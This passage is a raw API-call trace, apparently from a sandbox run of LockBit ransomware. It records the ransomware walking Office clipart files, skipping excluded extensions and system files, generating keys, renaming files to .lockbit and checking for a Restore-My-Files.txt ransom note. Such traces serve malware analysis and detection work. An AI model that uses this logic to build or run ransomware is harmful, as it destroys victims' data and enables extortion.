Office\\CLIPART\\PUB60COR\\SO00289_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.116] malloc (_Size=0xa6) returned 0x1fa2ed8 [0175.116] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0175.117] free (_Block=0x1fa2ed8) [0175.118] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00289_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0175.118] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0175.118] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0175.118] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xba531a00, ftCreationTime.dwHighDateTime=0x1bf323f, ftLastAccessTime.dwLowDateTime=0x5aa18b10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xba531a00, ftLastWriteTime.dwHighDateTime=0x1bf323f, nFileSizeHigh=0x0, nFileSizeLow=0x10cb8, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO00299_.WMF", cAlternateFileName="")) returned 1 [0175.118] lstrcmpiW (lpString1=".", lpString2="SO00299_.WMF") returned -1 [0175.118] lstrcmpiW (lpString1="..", lpString2="SO00299_.WMF") returned -1 [0175.118] PathFindExtensionW (pszPath="SO00299_.WMF") returned=".WMF" [0175.118] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0175.118] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0175.118] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0175.118] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0175.118] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0175.118] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0175.118] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0175.118] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0175.118] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0175.118] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0175.118] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0175.118] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0175.118] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0175.119] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0175.119] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0175.119] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0175.119] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0175.119] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0175.119] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0175.119] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0175.119] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0175.119] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0175.119] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0175.119] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0175.119] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.119] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0175.119] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0175.119] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0175.119] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0175.119] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0175.119] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0175.119] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0175.119] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0175.119] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0175.119] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0175.120] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0175.120] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0175.120] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0175.120] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0175.120] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0175.120] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0175.120] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0175.120] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.120] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0175.120] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0175.120] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0175.120] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0175.120] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO00299_.WMF") returned -1 [0175.120] lstrcmpiW (lpString1="ntldr", lpString2="SO00299_.WMF") returned -1 [0175.120] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO00299_.WMF") returned -1 [0175.120] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO00299_.WMF") returned -1 [0175.120] lstrcmpiW (lpString1="autorun.inf", lpString2="SO00299_.WMF") returned -1 [0175.120] lstrcmpiW (lpString1="thumbs.db", lpString2="SO00299_.WMF") returned 1 [0175.120] lstrcmpiW (lpString1="iconcache.db", lpString2="SO00299_.WMF") returned -1 [0175.120] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0175.120] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00299_.WMF") returned=".WMF" [0175.120] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0175.120] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0175.120] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0175.121] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0175.121] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0175.121] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0175.121] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0175.121] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0175.121] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0175.121] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0175.121] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0175.121] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0175.121] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0175.121] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0175.121] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0175.121] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0175.121] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0175.121] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0175.121] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0175.121] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0175.121] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0175.121] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0175.121] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0175.121] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0175.121] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0175.121] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0175.121] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0175.121] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0175.121] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00299_.WMF.lockbit") returned 72 [0175.122] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00299_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00299_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0175.123] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0175.123] malloc (_Size=0x40068) returned 0x1ff1e60 [0175.123] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=68792) returned 1 [0175.123] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.123] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.123] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0175.124] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.124] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.124] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0175.124] ReadFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0175.128] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00299_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00299_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.128] malloc (_Size=0xa6) returned 0x1fa2ed8 [0175.129] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0175.130] free (_Block=0x1fa2ed8) [0175.131] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00299_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0175.131] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0175.131] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0175.131] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d82d600, ftCreationTime.dwHighDateTime=0x1bd4ae3, ftLastAccessTime.dwLowDateTime=0x5aa18b10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7d82d600, ftLastWriteTime.dwHighDateTime=0x1bd4ae3, nFileSizeHigh=0x0, nFileSizeLow=0x7a04, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO00305_.WMF", cAlternateFileName="")) returned 1 [0175.131] lstrcmpiW (lpString1=".", lpString2="SO00305_.WMF") returned -1 [0175.131] lstrcmpiW (lpString1="..", lpString2="SO00305_.WMF") returned -1 [0175.131] PathFindExtensionW (pszPath="SO00305_.WMF") returned=".WMF" [0175.131] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0175.131] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0175.131] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0175.131] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0175.131] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0175.131] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0175.131] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0175.131] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0175.131] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0175.131] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0175.131] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0175.131] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0175.131] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0175.131] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0175.131] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0175.132] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0175.132] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0175.132] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0175.132] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0175.132] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0175.132] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0175.132] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0175.132] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0175.132] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0175.132] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.132] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0175.132] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0175.132] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0175.132] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0175.132] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0175.132] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0175.132] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0175.132] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0175.132] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0175.132] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0175.132] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0175.133] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0175.133] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0175.133] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0175.133] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0175.133] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0175.133] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0175.133] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.133] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0175.133] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0175.133] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0175.133] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0175.133] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO00305_.WMF") returned -1 [0175.133] lstrcmpiW (lpString1="ntldr", lpString2="SO00305_.WMF") returned -1 [0175.133] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO00305_.WMF") returned -1 [0175.133] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO00305_.WMF") returned -1 [0175.133] lstrcmpiW (lpString1="autorun.inf", lpString2="SO00305_.WMF") returned -1 [0175.133] lstrcmpiW (lpString1="thumbs.db", lpString2="SO00305_.WMF") returned 1 [0175.133] lstrcmpiW (lpString1="iconcache.db", lpString2="SO00305_.WMF") returned -1 [0175.133] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0175.133] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00305_.WMF") returned=".WMF" [0175.133] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0175.133] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0175.133] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0175.133] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0175.133] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0175.133] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0175.133] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0175.134] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0175.134] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0175.134] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0175.134] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0175.134] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0175.134] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0175.134] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0175.134] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0175.134] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0175.134] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0175.134] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0175.134] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0175.134] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0175.134] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0175.134] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0175.134] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0175.134] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0175.134] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0175.134] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0175.134] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0175.134] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0175.134] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00305_.WMF.lockbit") returned 72 [0175.134] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00305_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00305_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0175.150] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0175.150] malloc (_Size=0x40068) returned 0x3df0008 [0175.150] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=31236) returned 1 [0175.151] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.151] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.151] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0175.151] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.152] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.152] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0175.152] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0175.154] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00305_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00305_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.154] malloc (_Size=0xa6) returned 0x1fa2ed8 [0175.154] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0175.155] free (_Block=0x1fa2ed8) [0175.155] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00305_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0175.155] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0175.155] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0175.156] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7b207c00, ftCreationTime.dwHighDateTime=0x1bd4ae3, ftLastAccessTime.dwLowDateTime=0x6d30c390, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7b207c00, ftLastWriteTime.dwHighDateTime=0x1bd4ae3, nFileSizeHigh=0x0, nFileSizeLow=0xee4a, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO00333_.WMF", cAlternateFileName="")) returned 1 [0175.156] lstrcmpiW (lpString1=".", lpString2="SO00333_.WMF") returned -1 [0175.156] lstrcmpiW (lpString1="..", lpString2="SO00333_.WMF") returned -1 [0175.156] PathFindExtensionW (pszPath="SO00333_.WMF") returned=".WMF" [0175.156] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0175.156] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0175.156] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0175.156] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0175.156] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0175.156] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0175.156] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0175.156] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0175.156] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0175.156] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0175.156] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0175.156] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0175.156] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0175.156] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0175.156] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0175.156] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0175.156] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0175.156] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0175.157] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0175.157] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0175.157] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0175.157] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0175.157] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0175.157] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0175.157] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.157] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0175.157] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0175.157] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0175.157] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0175.157] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0175.157] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0175.157] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0175.157] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0175.157] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0175.157] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0175.157] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0175.157] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0175.157] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0175.157] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0175.157] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0175.157] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0175.158] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0175.158] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.158] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0175.158] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0175.158] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0175.158] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0175.158] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO00333_.WMF") returned -1 [0175.158] lstrcmpiW (lpString1="ntldr", lpString2="SO00333_.WMF") returned -1 [0175.158] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO00333_.WMF") returned -1 [0175.158] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO00333_.WMF") returned -1 [0175.158] lstrcmpiW (lpString1="autorun.inf", lpString2="SO00333_.WMF") returned -1 [0175.158] lstrcmpiW (lpString1="thumbs.db", lpString2="SO00333_.WMF") returned 1 [0175.158] lstrcmpiW (lpString1="iconcache.db", lpString2="SO00333_.WMF") returned -1 [0175.158] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0175.158] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00333_.WMF") returned=".WMF" [0175.158] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0175.158] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 